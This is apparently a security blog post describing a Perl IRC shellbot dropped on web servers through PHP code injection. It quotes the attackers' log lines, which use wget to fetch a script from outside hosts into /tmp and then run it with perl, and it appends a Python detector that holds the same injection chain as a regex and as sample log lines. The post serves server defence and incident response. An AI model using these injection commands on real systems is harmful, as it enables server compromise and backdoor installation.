“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently you may have seen strange input in your server logs…

Something like:

<?php system("wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz"); ?>


What does that mean? Well, first of all, your server is potentially vulnerable to PHP code injection, at least. Check it, then update, patch or fix it.

Second – check for processes that run from the /tmp/ folder under the default Apache user. If there are any, you have been infected. Take care of it.
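Both checks above, as an added example that is not part of the original post: it flags access-log lines carrying the system() → wget to /tmp → perl chain (including URL-encoded variants) and flags processes run by the web server user from /tmp/. The log and `ps aux` lines are constructed samples; hosts use the reserved example.invalid name.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log and `ps aux` lines (not from the original post);
# hosts use the reserved example.invalid name. The second log line is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [02/May/2014:10:14:01 +0000] "GET /index.php?page=<?php system(\\"wget http://example.invalid/lol.c -O /tmp/shz;perl /tmp/shz\\"); ?> HTTP/1.1" 200 512
203.0.113.9 - - [02/May/2014:10:15:22 +0000] "POST /contact.php HTTP/1.1" 200 73
198.51.100.7 - - [02/May/2014:10:16:03 +0000] "GET /?q=%3C%3Fphp%20system(%22wget%20http%3A%2F%2Fexample.invalid%2Flol.c%20-O%20%2Ftmp%2Fshz%3Bperl%20%2Ftmp%2Fshz%22)%3B%20%3F%3E HTTP/1.1" 404 0
"""
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1001  0.0  0.1  10000  1024 ?        Ss   09:00   0:00 /usr/sbin/sshd
www-data  2100  0.0  0.3  45678  6144 ?        S    10:00   0:01 /usr/sbin/apache2 -k start
www-data  2341  0.0  0.1  12345  2048 ?        S    10:14   0:00 perl /tmp/shz
"""

# The chain seen in the post: PHP system() -> wget into /tmp -> perl on the dropped file.
INJECTION = re.compile(
    r"<\?php\s+system\s*\(.*?wget\s+\S+\s+-O\s+/tmp/[^\s;]+.*?perl\s+/tmp/", re.I | re.S
)
WEB_USERS = ("apache", "www-data", "httpd", "nobody")  # assumed web server accounts


def find_injection_attempts(log_text):
    """Return (line_no, client_ip) for every log line carrying the injection chain."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        decoded = unquote(line)  # the payload is often URL-encoded in the request line
        if INJECTION.search(decoded):
            hits.append((n, line.split()[0]))
    return hits


def suspicious_processes(ps_text, web_users=WEB_USERS):
    """Return (user, pid, command) for web-server-user processes touching /tmp/."""
    hits = []
    for line in ps_text.splitlines():
        parts = line.split(None, 10)  # USER PID ... COMMAND (ps aux layout)
        if len(parts) < 11 or parts[0] not in web_users:
            continue
        if re.search(r"(^|\s)/tmp/", parts[10]):
            hits.append((parts[0], int(parts[1]), parts[10]))
    return hits


if __name__ == "__main__":
    print("injection attempts:", find_injection_attempts(SAMPLE_LOG))
    print("suspicious processes:", suspicious_processes(SAMPLE_PS))
```

On a real host, feed it the access log and the output of `ps aux`; any hit on the second check deserves the same response the post describes.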

Now, what exactly does this thing look like?

Header: [screenshot of the script header]

VT sample, in case you are curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It is an IRC-controlled bot whose main capability is sending spam. The language looks like Portuguese – Brazilian?

It has also been seen in the wild since at least 2012, Google says 🙂 But older versions had less functionality. And now it is back 🙂

This is how it behaves:

1. The script connects to an IRC server protected with credentials [unfortunately, it is not available now]

2. It fetches a list of mail addresses, names and reply addresses from embedded URLs, composes the mail messages and sends them on behalf of the Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and execution

And, since fun is everything in malware hunting:

One of the functions: [screenshot of one of the script's functions]

🙂 he/she is so excited 🙂

It is not a new player on this field, but recently he/she is back in business, so please be aware.

Well, review your logs and/or update me in case you have some additional information.

Stay safe

D.L.
